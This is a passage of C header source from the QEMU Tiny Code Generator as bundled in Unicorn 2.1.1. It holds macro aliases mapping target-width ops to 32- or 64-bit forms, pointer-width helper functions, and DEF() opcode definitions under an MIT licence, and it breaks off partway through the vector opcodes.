#define tcg_gen_ext_i32_tl tcg_gen_ext_i32_i64 #define tcg_gen_extu_tl_i64 tcg_gen_mov_i64 #define tcg_gen_ext_tl_i64 tcg_gen_mov_i64 #define tcg_gen_ext8u_tl tcg_gen_ext8u_i64 #define tcg_gen_ext8s_tl tcg_gen_ext8s_i64 #define tcg_gen_ext16u_tl tcg_gen_ext16u_i64 #define tcg_gen_ext16s_tl tcg_gen_ext16s_i64 #define tcg_gen_ext32u_tl tcg_gen_ext32u_i64 #define tcg_gen_ext32s_tl tcg_gen_ext32s_i64 #define tcg_gen_bswap16_tl tcg_gen_bswap16_i64 #define tcg_gen_bswap32_tl tcg_gen_bswap32_i64 #define tcg_gen_bswap64_tl tcg_gen_bswap64_i64 #define tcg_gen_concat_tl_i64 tcg_gen_concat32_i64 #define tcg_gen_extr_i64_tl tcg_gen_extr32_i64 #define tcg_gen_andc_tl tcg_gen_andc_i64 #define tcg_gen_eqv_tl tcg_gen_eqv_i64 #define tcg_gen_nand_tl tcg_gen_nand_i64 #define tcg_gen_nor_tl tcg_gen_nor_i64 #define tcg_gen_orc_tl tcg_gen_orc_i64 #define tcg_gen_clz_tl tcg_gen_clz_i64 #define tcg_gen_ctz_tl tcg_gen_ctz_i64 #define tcg_gen_clzi_tl tcg_gen_clzi_i64 #define tcg_gen_ctzi_tl tcg_gen_ctzi_i64 #define tcg_gen_clrsb_tl tcg_gen_clrsb_i64 #define tcg_gen_ctpop_tl tcg_gen_ctpop_i64 #define tcg_gen_rotl_tl tcg_gen_rotl_i64 #define tcg_gen_rotli_tl tcg_gen_rotli_i64 #define tcg_gen_rotr_tl tcg_gen_rotr_i64 #define tcg_gen_rotri_tl tcg_gen_rotri_i64 #define tcg_gen_deposit_tl tcg_gen_deposit_i64 #define tcg_gen_deposit_z_tl tcg_gen_deposit_z_i64 #define tcg_gen_extract_tl tcg_gen_extract_i64 #define tcg_gen_sextract_tl tcg_gen_sextract_i64 #define tcg_gen_extract2_tl tcg_gen_extract2_i64 #define tcg_const_tl tcg_const_i64 #define tcg_const_local_tl tcg_const_local_i64 #define tcg_gen_movcond_tl tcg_gen_movcond_i64 #define tcg_gen_add2_tl tcg_gen_add2_i64 #define tcg_gen_sub2_tl tcg_gen_sub2_i64 #define tcg_gen_mulu2_tl 
tcg_gen_mulu2_i64 #define tcg_gen_muls2_tl tcg_gen_muls2_i64 #define tcg_gen_mulsu2_tl tcg_gen_mulsu2_i64 #define tcg_gen_smin_tl tcg_gen_smin_i64 #define tcg_gen_umin_tl tcg_gen_umin_i64 #define tcg_gen_smax_tl tcg_gen_smax_i64 #define tcg_gen_umax_tl tcg_gen_umax_i64 #define tcg_gen_atomic_cmpxchg_tl tcg_gen_atomic_cmpxchg_i64 #define tcg_gen_atomic_xchg_tl tcg_gen_atomic_xchg_i64 #define tcg_gen_atomic_fetch_add_tl tcg_gen_atomic_fetch_add_i64 #define tcg_gen_atomic_fetch_and_tl tcg_gen_atomic_fetch_and_i64 #define tcg_gen_atomic_fetch_or_tl tcg_gen_atomic_fetch_or_i64 #define tcg_gen_atomic_fetch_xor_tl tcg_gen_atomic_fetch_xor_i64 #define tcg_gen_atomic_fetch_smin_tl tcg_gen_atomic_fetch_smin_i64 #define tcg_gen_atomic_fetch_umin_tl tcg_gen_atomic_fetch_umin_i64 #define tcg_gen_atomic_fetch_smax_tl tcg_gen_atomic_fetch_smax_i64 #define tcg_gen_atomic_fetch_umax_tl tcg_gen_atomic_fetch_umax_i64 #define tcg_gen_atomic_add_fetch_tl tcg_gen_atomic_add_fetch_i64 #define tcg_gen_atomic_and_fetch_tl tcg_gen_atomic_and_fetch_i64 #define tcg_gen_atomic_or_fetch_tl tcg_gen_atomic_or_fetch_i64 #define tcg_gen_atomic_xor_fetch_tl tcg_gen_atomic_xor_fetch_i64 #define tcg_gen_atomic_smin_fetch_tl tcg_gen_atomic_smin_fetch_i64 #define tcg_gen_atomic_umin_fetch_tl tcg_gen_atomic_umin_fetch_i64 #define tcg_gen_atomic_smax_fetch_tl tcg_gen_atomic_smax_fetch_i64 #define tcg_gen_atomic_umax_fetch_tl tcg_gen_atomic_umax_fetch_i64 #define tcg_gen_dup_tl_vec tcg_gen_dup_i64_vec #else #define tcg_gen_movi_tl tcg_gen_movi_i32 #define tcg_gen_mov_tl tcg_gen_mov_i32 #define tcg_gen_ld8u_tl tcg_gen_ld8u_i32 #define tcg_gen_ld8s_tl tcg_gen_ld8s_i32 #define tcg_gen_ld16u_tl tcg_gen_ld16u_i32 #define tcg_gen_ld16s_tl tcg_gen_ld16s_i32 #define tcg_gen_ld32u_tl tcg_gen_ld_i32 #define tcg_gen_ld32s_tl tcg_gen_ld_i32 #define tcg_gen_ld_tl tcg_gen_ld_i32 #define tcg_gen_st8_tl tcg_gen_st8_i32 #define tcg_gen_st16_tl tcg_gen_st16_i32 #define tcg_gen_st32_tl tcg_gen_st_i32 #define tcg_gen_st_tl tcg_gen_st_i32 #define tcg_gen_add_tl tcg_gen_add_i32 #define tcg_gen_addi_tl tcg_gen_addi_i32 #define tcg_gen_sub_tl tcg_gen_sub_i32 #define tcg_gen_neg_tl tcg_gen_neg_i32 #define tcg_gen_abs_tl tcg_gen_abs_i32 #define tcg_gen_subfi_tl tcg_gen_subfi_i32 #define tcg_gen_subi_tl tcg_gen_subi_i32 #define tcg_gen_and_tl tcg_gen_and_i32 #define tcg_gen_andi_tl tcg_gen_andi_i32 #define tcg_gen_or_tl tcg_gen_or_i32 #define tcg_gen_ori_tl tcg_gen_ori_i32 #define tcg_gen_xor_tl tcg_gen_xor_i32 #define tcg_gen_xori_tl tcg_gen_xori_i32 #define tcg_gen_not_tl tcg_gen_not_i32 #define tcg_gen_shl_tl tcg_gen_shl_i32 #define tcg_gen_shli_tl tcg_gen_shli_i32 #define tcg_gen_shr_tl tcg_gen_shr_i32 #define tcg_gen_shri_tl tcg_gen_shri_i32 #define tcg_gen_sar_tl tcg_gen_sar_i32 #define tcg_gen_sari_tl tcg_gen_sari_i32 #define tcg_gen_brcond_tl tcg_gen_brcond_i32 #define tcg_gen_brcondi_tl tcg_gen_brcondi_i32 #define tcg_gen_setcond_tl tcg_gen_setcond_i32 #define tcg_gen_setcondi_tl tcg_gen_setcondi_i32 #define tcg_gen_mul_tl tcg_gen_mul_i32 #define tcg_gen_muli_tl tcg_gen_muli_i32 #define tcg_gen_div_tl tcg_gen_div_i32 #define tcg_gen_rem_tl tcg_gen_rem_i32 #define tcg_gen_divu_tl tcg_gen_divu_i32 #define tcg_gen_remu_tl tcg_gen_remu_i32 #define tcg_gen_discard_tl tcg_gen_discard_i32 #define tcg_gen_trunc_tl_i32 tcg_gen_mov_i32 #define tcg_gen_trunc_i64_tl tcg_gen_extrl_i64_i32 #define tcg_gen_extu_i32_tl tcg_gen_mov_i32 #define tcg_gen_ext_i32_tl tcg_gen_mov_i32 #define tcg_gen_extu_tl_i64 tcg_gen_extu_i32_i64 #define tcg_gen_ext_tl_i64 
tcg_gen_ext_i32_i64 #define tcg_gen_ext8u_tl tcg_gen_ext8u_i32 #define tcg_gen_ext8s_tl tcg_gen_ext8s_i32 #define tcg_gen_ext16u_tl tcg_gen_ext16u_i32 #define tcg_gen_ext16s_tl tcg_gen_ext16s_i32 #define tcg_gen_ext32u_tl tcg_gen_mov_i32 #define tcg_gen_ext32s_tl tcg_gen_mov_i32 #define tcg_gen_bswap16_tl tcg_gen_bswap16_i32 #define tcg_gen_bswap32_tl tcg_gen_bswap32_i32 #define tcg_gen_concat_tl_i64 tcg_gen_concat_i32_i64 #define tcg_gen_extr_i64_tl tcg_gen_extr_i64_i32 #define tcg_gen_andc_tl tcg_gen_andc_i32 #define tcg_gen_eqv_tl tcg_gen_eqv_i32 #define tcg_gen_nand_tl tcg_gen_nand_i32 #define tcg_gen_nor_tl tcg_gen_nor_i32 #define tcg_gen_orc_tl tcg_gen_orc_i32 #define tcg_gen_clz_tl tcg_gen_clz_i32 #define tcg_gen_ctz_tl tcg_gen_ctz_i32 #define tcg_gen_clzi_tl tcg_gen_clzi_i32 #define tcg_gen_ctzi_tl tcg_gen_ctzi_i32 #define tcg_gen_clrsb_tl tcg_gen_clrsb_i32 #define tcg_gen_ctpop_tl tcg_gen_ctpop_i32 #define tcg_gen_rotl_tl tcg_gen_rotl_i32 #define tcg_gen_rotli_tl tcg_gen_rotli_i32 #define tcg_gen_rotr_tl tcg_gen_rotr_i32 #define tcg_gen_rotri_tl tcg_gen_rotri_i32 #define tcg_gen_deposit_tl tcg_gen_deposit_i32 #define tcg_gen_deposit_z_tl tcg_gen_deposit_z_i32 #define tcg_gen_extract_tl tcg_gen_extract_i32 #define tcg_gen_sextract_tl tcg_gen_sextract_i32 #define tcg_gen_extract2_tl tcg_gen_extract2_i32 #define tcg_const_tl tcg_const_i32 #define tcg_const_local_tl tcg_const_local_i32 #define tcg_gen_movcond_tl tcg_gen_movcond_i32 #define tcg_gen_add2_tl tcg_gen_add2_i32 #define tcg_gen_sub2_tl tcg_gen_sub2_i32 #define tcg_gen_mulu2_tl tcg_gen_mulu2_i32 #define tcg_gen_muls2_tl tcg_gen_muls2_i32 #define tcg_gen_mulsu2_tl tcg_gen_mulsu2_i32 #define tcg_gen_smin_tl tcg_gen_smin_i32 #define tcg_gen_umin_tl tcg_gen_umin_i32 #define tcg_gen_smax_tl tcg_gen_smax_i32 #define tcg_gen_umax_tl tcg_gen_umax_i32 #define tcg_gen_atomic_cmpxchg_tl tcg_gen_atomic_cmpxchg_i32 #define tcg_gen_atomic_xchg_tl tcg_gen_atomic_xchg_i32 #define tcg_gen_atomic_fetch_add_tl tcg_gen_atomic_fetch_add_i32 #define tcg_gen_atomic_fetch_and_tl tcg_gen_atomic_fetch_and_i32 #define tcg_gen_atomic_fetch_or_tl tcg_gen_atomic_fetch_or_i32 #define tcg_gen_atomic_fetch_xor_tl tcg_gen_atomic_fetch_xor_i32 #define tcg_gen_atomic_fetch_smin_tl tcg_gen_atomic_fetch_smin_i32 #define tcg_gen_atomic_fetch_umin_tl tcg_gen_atomic_fetch_umin_i32 #define tcg_gen_atomic_fetch_smax_tl tcg_gen_atomic_fetch_smax_i32 #define tcg_gen_atomic_fetch_umax_tl tcg_gen_atomic_fetch_umax_i32 #define tcg_gen_atomic_add_fetch_tl tcg_gen_atomic_add_fetch_i32 #define tcg_gen_atomic_and_fetch_tl tcg_gen_atomic_and_fetch_i32 #define tcg_gen_atomic_or_fetch_tl tcg_gen_atomic_or_fetch_i32 #define tcg_gen_atomic_xor_fetch_tl tcg_gen_atomic_xor_fetch_i32 #define tcg_gen_atomic_smin_fetch_tl tcg_gen_atomic_smin_fetch_i32 #define tcg_gen_atomic_umin_fetch_tl tcg_gen_atomic_umin_fetch_i32 #define tcg_gen_atomic_smax_fetch_tl tcg_gen_atomic_smax_fetch_i32 #define tcg_gen_atomic_umax_fetch_tl tcg_gen_atomic_umax_fetch_i32 #define tcg_gen_dup_tl_vec tcg_gen_dup_i32_vec #endif #if UINTPTR_MAX == UINT32_MAX # define PTR i32 # define NAT TCGv_i32 #else # define PTR i64 # define NAT TCGv_i64 #endif static inline void tcg_gen_ld_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_ptr a, intptr_t o) { glue(tcg_gen_ld_,PTR)(tcg_ctx, (NAT)r, a, o); } static inline void tcg_gen_st_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_ptr a, intptr_t o) { glue(tcg_gen_st_, PTR)(tcg_ctx, (NAT)r, a, o); } static inline void tcg_gen_discard_ptr(TCGContext *tcg_ctx, TCGv_ptr a) { 
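/* glue() token-pastes the PTR suffix chosen above, so each of these pointer-sized helpers forwards to its _i32 or _i64 counterpart according to the host pointer width; e.g. on a 64-bit host the call below expands to tcg_gen_discard_i64(tcg_ctx, (TCGv_i64)a). */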
glue(tcg_gen_discard_,PTR)(tcg_ctx, (NAT)a); } static inline void tcg_gen_add_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_ptr a, TCGv_ptr b) { glue(tcg_gen_add_,PTR)(tcg_ctx, (NAT)r, (NAT)a, (NAT)b); } static inline void tcg_gen_addi_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_ptr a, intptr_t b) { glue(tcg_gen_addi_,PTR)(tcg_ctx, (NAT)r, (NAT)a, b); } static inline void tcg_gen_brcondi_ptr(TCGContext *tcg_ctx, TCGCond cond, TCGv_ptr a, intptr_t b, TCGLabel *label) { glue(tcg_gen_brcondi_,PTR)(tcg_ctx, cond, (NAT)a, b, label); } static inline void tcg_gen_ext_i32_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_i32 a) { #if UINTPTR_MAX == UINT32_MAX tcg_gen_mov_i32(tcg_ctx, (NAT)r, a); #else tcg_gen_ext_i32_i64(tcg_ctx, (NAT)r, a); #endif } static inline void tcg_gen_trunc_i64_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_i64 a) { #if UINTPTR_MAX == UINT32_MAX tcg_gen_extrl_i64_i32(tcg_ctx, (NAT)r, a); #else tcg_gen_mov_i64(tcg_ctx, (NAT)r, a); #endif } static inline void tcg_gen_extu_ptr_i64(TCGContext *tcg_ctx, TCGv_i64 r, TCGv_ptr a) { #if UINTPTR_MAX == UINT32_MAX tcg_gen_extu_i32_i64(tcg_ctx, r, (NAT)a); #else tcg_gen_mov_i64(tcg_ctx, r, (NAT)a); #endif } static inline void tcg_gen_trunc_ptr_i32(TCGContext *tcg_ctx, TCGv_i32 r, TCGv_ptr a) { #if UINTPTR_MAX == UINT32_MAX tcg_gen_mov_i32(tcg_ctx, r, (NAT)a); #else tcg_gen_extrl_i64_i32(tcg_ctx, r, (NAT)a); #endif } #undef PTR #undef NAT #endif /* TCG_TCG_OP_H */ unicorn-2.1.1/qemu/include/tcg/tcg-opc.h /* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. 
*/ /* * DEF(name, oargs, iargs, cargs, flags) */ /* predefined ops */ DEF(discard, 1, 0, 0, TCG_OPF_NOT_PRESENT) DEF(set_label, 0, 0, 1, TCG_OPF_BB_END | TCG_OPF_NOT_PRESENT) /* variable number of parameters */ DEF(call, 0, 0, 3, TCG_OPF_CALL_CLOBBER | TCG_OPF_NOT_PRESENT) DEF(br, 0, 0, 1, TCG_OPF_BB_END) #ifndef _MSC_VER #define IMPL(X) (__builtin_constant_p(X) && (X) <= 0 ? TCG_OPF_NOT_PRESENT : 0) #else #define IMPL(X) ((X) <= 0 ? TCG_OPF_NOT_PRESENT : 0) #endif #if TCG_TARGET_REG_BITS == 32 # define IMPL64 TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT #else # define IMPL64 TCG_OPF_64BIT #endif DEF(mb, 0, 0, 1, 0) DEF(mov_i32, 1, 1, 0, TCG_OPF_NOT_PRESENT) DEF(movi_i32, 1, 0, 1, TCG_OPF_NOT_PRESENT) DEF(setcond_i32, 1, 2, 1, 0) DEF(movcond_i32, 1, 4, 1, IMPL(TCG_TARGET_HAS_movcond_i32)) /* load/store */ DEF(ld8u_i32, 1, 1, 1, 0) DEF(ld8s_i32, 1, 1, 1, 0) DEF(ld16u_i32, 1, 1, 1, 0) DEF(ld16s_i32, 1, 1, 1, 0) DEF(ld_i32, 1, 1, 1, 0) DEF(st8_i32, 0, 2, 1, 0) DEF(st16_i32, 0, 2, 1, 0) DEF(st_i32, 0, 2, 1, 0) /* arith */ DEF(add_i32, 1, 2, 0, 0) DEF(sub_i32, 1, 2, 0, 0) DEF(mul_i32, 1, 2, 0, 0) DEF(div_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_div_i32)) DEF(divu_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_div_i32)) DEF(rem_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rem_i32)) DEF(remu_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rem_i32)) DEF(div2_i32, 2, 3, 0, IMPL(TCG_TARGET_HAS_div2_i32)) DEF(divu2_i32, 2, 3, 0, IMPL(TCG_TARGET_HAS_div2_i32)) DEF(and_i32, 1, 2, 0, 0) DEF(or_i32, 1, 2, 0, 0) DEF(xor_i32, 1, 2, 0, 0) /* shifts/rotates */ DEF(shl_i32, 1, 2, 0, 0) DEF(shr_i32, 1, 2, 0, 0) DEF(sar_i32, 1, 2, 0, 0) DEF(rotl_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rot_i32)) DEF(rotr_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rot_i32)) DEF(deposit_i32, 1, 2, 2, IMPL(TCG_TARGET_HAS_deposit_i32)) DEF(extract_i32, 1, 1, 2, IMPL(TCG_TARGET_HAS_extract_i32)) DEF(sextract_i32, 1, 1, 2, IMPL(TCG_TARGET_HAS_sextract_i32)) DEF(extract2_i32, 1, 2, 1, IMPL(TCG_TARGET_HAS_extract2_i32)) DEF(brcond_i32, 0, 2, 2, TCG_OPF_BB_END) DEF(add2_i32, 2, 4, 0, IMPL(TCG_TARGET_HAS_add2_i32)) DEF(sub2_i32, 2, 4, 0, IMPL(TCG_TARGET_HAS_sub2_i32)) DEF(mulu2_i32, 2, 2, 0, IMPL(TCG_TARGET_HAS_mulu2_i32)) DEF(muls2_i32, 2, 2, 0, IMPL(TCG_TARGET_HAS_muls2_i32)) DEF(muluh_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_muluh_i32)) DEF(mulsh_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_mulsh_i32)) DEF(brcond2_i32, 0, 4, 2, TCG_OPF_BB_END | IMPL(TCG_TARGET_REG_BITS == 32)) DEF(setcond2_i32, 1, 4, 1, IMPL(TCG_TARGET_REG_BITS == 32)) DEF(ext8s_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext8s_i32)) DEF(ext16s_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext16s_i32)) DEF(ext8u_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext8u_i32)) DEF(ext16u_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext16u_i32)) DEF(bswap16_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_bswap16_i32)) DEF(bswap32_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_bswap32_i32)) DEF(not_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_not_i32)) DEF(neg_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_neg_i32)) #ifdef _MSC_VER DEF(andc_i32, 1, 2, 0, 0) #else DEF(andc_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_andc_i32)) #endif DEF(orc_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_orc_i32)) DEF(eqv_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_eqv_i32)) DEF(nand_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_nand_i32)) DEF(nor_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_nor_i32)) DEF(clz_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_clz_i32)) DEF(ctz_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_ctz_i32)) #ifdef _MSC_VER DEF(ctpop_i32, 1, 1, 0, 0) #else DEF(ctpop_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ctpop_i32)) #endif DEF(mov_i64, 1, 1, 0, TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT) DEF(movi_i64, 1, 0, 1, TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT) 
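/* Reading these entries: DEF(name, oargs, iargs, cargs, flags) declares opcode INDEX_op_<name> taking oargs output, iargs input and cargs constant arguments; e.g. DEF(add_i32, 1, 2, 0, 0) above is one output and two inputs. IMPL()/IMPL64 mark opcodes a given TCG backend may not implement. The 64-bit variants follow. */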
DEF(setcond_i64, 1, 2, 1, IMPL64) DEF(movcond_i64, 1, 4, 1, IMPL64 | IMPL(TCG_TARGET_HAS_movcond_i64)) /* load/store */ DEF(ld8u_i64, 1, 1, 1, IMPL64) DEF(ld8s_i64, 1, 1, 1, IMPL64) DEF(ld16u_i64, 1, 1, 1, IMPL64) DEF(ld16s_i64, 1, 1, 1, IMPL64) DEF(ld32u_i64, 1, 1, 1, IMPL64) DEF(ld32s_i64, 1, 1, 1, IMPL64) DEF(ld_i64, 1, 1, 1, IMPL64) DEF(st8_i64, 0, 2, 1, IMPL64) DEF(st16_i64, 0, 2, 1, IMPL64) DEF(st32_i64, 0, 2, 1, IMPL64) DEF(st_i64, 0, 2, 1, IMPL64) /* arith */ DEF(add_i64, 1, 2, 0, IMPL64) DEF(sub_i64, 1, 2, 0, IMPL64) DEF(mul_i64, 1, 2, 0, IMPL64) DEF(div_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div_i64)) DEF(divu_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div_i64)) DEF(rem_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rem_i64)) DEF(remu_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rem_i64)) DEF(div2_i64, 2, 3, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div2_i64)) DEF(divu2_i64, 2, 3, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div2_i64)) DEF(and_i64, 1, 2, 0, IMPL64) DEF(or_i64, 1, 2, 0, IMPL64) DEF(xor_i64, 1, 2, 0, IMPL64) /* shifts/rotates */ DEF(shl_i64, 1, 2, 0, IMPL64) DEF(shr_i64, 1, 2, 0, IMPL64) DEF(sar_i64, 1, 2, 0, IMPL64) DEF(rotl_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rot_i64)) DEF(rotr_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rot_i64)) DEF(deposit_i64, 1, 2, 2, IMPL64 | IMPL(TCG_TARGET_HAS_deposit_i64)) DEF(extract_i64, 1, 1, 2, IMPL64 | IMPL(TCG_TARGET_HAS_extract_i64)) DEF(sextract_i64, 1, 1, 2, IMPL64 | IMPL(TCG_TARGET_HAS_sextract_i64)) DEF(extract2_i64, 1, 2, 1, IMPL64 | IMPL(TCG_TARGET_HAS_extract2_i64)) /* size changing ops */ DEF(ext_i32_i64, 1, 1, 0, IMPL64) DEF(extu_i32_i64, 1, 1, 0, IMPL64) DEF(extrl_i64_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_extrl_i64_i32) | (TCG_TARGET_REG_BITS == 32 ? TCG_OPF_NOT_PRESENT : 0)) DEF(extrh_i64_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_extrh_i64_i32) | (TCG_TARGET_REG_BITS == 32 ? 
TCG_OPF_NOT_PRESENT : 0)) DEF(brcond_i64, 0, 2, 2, TCG_OPF_BB_END | IMPL64) DEF(ext8s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext8s_i64)) DEF(ext16s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext16s_i64)) DEF(ext32s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext32s_i64)) DEF(ext8u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext8u_i64)) DEF(ext16u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext16u_i64)) DEF(ext32u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext32u_i64)) DEF(bswap16_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap16_i64)) DEF(bswap32_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap32_i64)) DEF(bswap64_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap64_i64)) DEF(not_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_not_i64)) DEF(neg_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_neg_i64)) #ifdef _MSC_VER DEF(andc_i64, 1, 2, 0, IMPL64) #else DEF(andc_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_andc_i64)) #endif DEF(orc_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_orc_i64)) DEF(eqv_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_eqv_i64)) DEF(nand_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_nand_i64)) DEF(nor_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_nor_i64)) DEF(clz_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_clz_i64)) DEF(ctz_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ctz_i64)) #ifdef _MSC_VER DEF(ctpop_i64, 1, 1, 0, IMPL64) #else DEF(ctpop_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ctpop_i64)) #endif DEF(add2_i64, 2, 4, 0, IMPL64 | IMPL(TCG_TARGET_HAS_add2_i64)) DEF(sub2_i64, 2, 4, 0, IMPL64 | IMPL(TCG_TARGET_HAS_sub2_i64)) DEF(mulu2_i64, 2, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_mulu2_i64)) DEF(muls2_i64, 2, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_muls2_i64)) DEF(muluh_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_muluh_i64)) DEF(mulsh_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_mulsh_i64)) #define TLADDR_ARGS (TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? 1 : 2) #define DATA64_ARGS (TCG_TARGET_REG_BITS == 64 ? 1 : 2) /* QEMU specific */ DEF(insn_start, 0, 0, TLADDR_ARGS * TARGET_INSN_START_WORDS, TCG_OPF_NOT_PRESENT) DEF(exit_tb, 0, 0, 1, TCG_OPF_BB_EXIT | TCG_OPF_BB_END) DEF(goto_tb, 0, 0, 1, TCG_OPF_BB_EXIT | TCG_OPF_BB_END) DEF(goto_ptr, 0, 1, 0, TCG_OPF_BB_EXIT | TCG_OPF_BB_END | IMPL(TCG_TARGET_HAS_goto_ptr)) DEF(qemu_ld_i32, 1, TLADDR_ARGS, 1, TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS) DEF(qemu_st_i32, 0, TLADDR_ARGS + 1, 1, TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS) DEF(qemu_ld_i64, DATA64_ARGS, TLADDR_ARGS, 1, TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS | TCG_OPF_64BIT) DEF(qemu_st_i64, 0, TLADDR_ARGS + DATA64_ARGS, 1, TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS | TCG_OPF_64BIT) /* Host vector support. 
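The vector opcodes below are reached through the tcg_gen_*_vec helpers declared in tcg-op.h, whose vece argument is the log2 of the element size; as an illustrative example, tcg_gen_add_vec(tcg_ctx, MO_32, r, a, b) adds 32-bit lanes. IMPLVEC below restricts these ops to backends that advertise TCG_TARGET_MAYBE_vec.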
*/ #define IMPLVEC TCG_OPF_VECTOR | IMPL(TCG_TARGET_MAYBE_vec) DEF(mov_vec, 1, 1, 0, TCG_OPF_VECTOR | TCG_OPF_NOT_PRESENT) DEF(dupi_vec, 1, 0, 1, TCG_OPF_VECTOR | TCG_OPF_NOT_PRESENT) DEF(dup_vec, 1, 1, 0, IMPLVEC) DEF(dup2_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_REG_BITS == 32)) DEF(ld_vec, 1, 1, 1, IMPLVEC) DEF(st_vec, 0, 2, 1, IMPLVEC) DEF(dupm_vec, 1, 1, 1, IMPLVEC) DEF(add_vec, 1, 2, 0, IMPLVEC) DEF(sub_vec, 1, 2, 0, IMPLVEC) DEF(mul_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_mul_vec)) DEF(neg_vec, 1, 1, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_neg_vec)) DEF(abs_vec, 1, 1, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_abs_vec)) DEF(ssadd_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_sat_vec)) DEF(usadd_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_sat_vec)) DEF(sssub_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_sat_vec)) DEF(ussub_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_sat_vec)) DEF(smin_vec, 1, 2, 0, 